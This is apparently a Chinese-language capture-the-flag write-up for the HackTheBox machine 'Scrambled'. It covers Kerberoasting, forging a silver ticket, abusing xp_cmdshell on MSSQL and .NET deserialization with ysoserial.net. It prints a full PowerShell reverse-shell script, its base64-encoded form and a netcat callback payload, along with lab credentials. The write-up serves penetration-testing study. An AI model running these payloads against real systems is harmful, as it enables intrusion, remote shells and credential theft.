Hackthebox - Scrambled- linux-编程知识

Recon

Port Scan

HTTP 80

根据在 support 页面得到的信息：

邮箱 support@scramblecorp.com
用户名 ksimpson
一个用于连接 4411 端口的软件
密码 ksimpson

SMB 445

这里连接 SMB 服务是连不上的，因为禁用了 NTLM

MSSQL 1443

SQL 服务也同样

Unknown service 4411

尝试连接 4411 端口，看样子需要指定的软件才能与 4411 端口通信

Kerberos enum

由于禁用了 NTLM 认证，所以后面的操作只能通过请求票据来认证。现在使用在 http://scrm.local/supportrequest.html 得到的用户名来尝试获取 TGT 票据

连接到 smb，在 Public 文件夹得到一个 PDF 文件

内容如下，这意味着接下来的攻击路径会和 smb 共享下的 HR 文件和 MSSQL 数据库有关

使用 GetUserSPNs 获取 sqlsvc 服务账户的 tgs

impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -dc-ip dc1.scrm.local -request -k

使用 hashcat 破解，得到凭据 sqlsvc:Pegasus60
使用凭据登录，出现报错

Silver ticker

由于禁用 NTLM，在得到凭据后需要制作 ST (Silver ticker)才能访问 MSSQL

要创建 ST，可以使用 ticketer 脚本

需要的参数有

NTHash
SID
FQDN (fully qualified domain name)
SPN (Service principal name)

下面将展示如何获取这些值
NTHash

 iconv -f <INPUT_ENCODING> -t <OUTPUT_ENCODING> <(printf "<PASSWORD>") | openssl dgst -md4

方法来自 Atucom: Generate NTLM hashes via command line
https://blog.atucom.net/2012/10/generate-ntlm-hashes-via-command-line.html
SID
使用 getPAC 来获取 SID 值

 impacket-getPac <DOMAIN>/<USERNAME>:<PASSWORD> -targetUser <TARGET_USER>

FQDN
域名为 scrm.local
SPN
在使用 getUserSPNs 时已得到 SPN，值为 MSSQLSvc/dc1.scrm.local

 impacket-ticketer -nthash <krbtgt/service nthash> -domain-sid <your domain SID> -domain <your domain FQDN> baduser
impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/dc1.scrm.local sqladmin

这条命令会输出一个 sqladmin.ccache 文件，需要使用 export KRB5CCNAME=sqladmin.ccache 设置环境变量才可以使用

MSSQL Enumeration

在 UserImport 表中得到一组新的凭据

xp_cmdshell

这里测试 xp_cmdshell 没有开启，需要使用 enable_xp_cmdshell 开启。

确认 xp_cmdshell 开启成功

Reverse shell

要获取 shell，首先要制作一个使用 base64 编码的 payload，然后在 MSSQL 交互处使用 xp_cmdshell 执行命令

┌──(kali㉿kali)-[~/WorkSpace/Hackthebox/Scrambled]
└─$ cat rev.ps1       
$client = New-Object System.Net.Sockets.TCPClient('10.10.16.4', 1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()                                                     
┌──(kali㉿kali)-[~/WorkSpace/Hackthebox/Scrambled]
└─$ str=`cat rev.ps1`                                                                                                         
┌──(kali㉿kali)-[~/WorkSpace/Hackthebox/Scrambled]
└─$ echo $str
$client = New-Object System.Net.Sockets.TCPClient('10.10.16.4', 1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()┌──(kali㉿kali)-[~/WorkSpace/Hackthebox/Scrambled]
└─$ echo -en $str | iconv -t UTF-16LE | base64 -w 0

由于得到的 sqlsvc shell 没有查看 user flag 权限，所以需要使用到之前在数据库里得到的凭据来获取 MiscSvc shell

$password = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force$creds = New-Object System.Management.Automation.PSCredential("scrm\miscsvc", $password)Invoke-Command -ComputerName dc1 -ScriptBlock {powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA2AC4ANAAnACwAIAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAiAC4AIAB7ACAAJABkAGEAdABhACAAfQAgADIAPgAmADEAIgAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACAAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==} -Credential $creds

在 sqlsvc 尝试了各种土豆提权失败，看来还需要深一步挖掘
来到 C:\Shares\IT\Apps\Sales Order Client 目录，可以看到之前在 web 站点看到的 ScrambleClient.exe。他能够与 4411 端口交互

使用 miscsvc 凭据连接到 smb，将 IT 下的 exe 和 dll 文件下载到 kali。
这里可以看到，用 .net 编写

ROOT

从分析 .net 开始就看不懂了
writeup 使用的 https://github.com/pwntester/ysoserial.net 来生成了 .net 反序列化的 payload

.\ysoserial.exe -f BinaryFormatter -g AxHostState -o base64 -c "C:\\programdata\\nc64.exe 10.10.14.6 444 -e cmd.exe"

Ref

HackTheBox, Scrambled | Hacking Blog
https://myhomeisquintoc.com/challenge/scrambled

HTB: Scrambled [From Linux] | 0xdf hacks stuff
https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html#mssql-enumeration

Atucom: Generate NTLM hashes via command line
https://blog.atucom.net/2012/10/generate-ntlm-hashes-via-command-line.html